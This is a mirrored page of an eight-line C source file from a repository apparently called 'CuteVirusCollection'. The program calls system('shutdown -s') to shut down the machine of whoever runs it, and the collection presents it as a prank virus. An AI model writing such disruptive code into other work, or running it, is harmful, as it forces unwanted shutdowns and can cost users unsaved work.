mirror of
https://github.com/MinhasKamal/CuteVirusCollection.git
synced 2025-12-12 07:40:43 -08:00
8 lines
92 B
C
8 lines
92 B
C
// Simply shuts the system down.
|
|
|
|
#include <stdlib.h>
|
|
|
|
main(){
|
|
system("shutdown -s");
|
|
}
|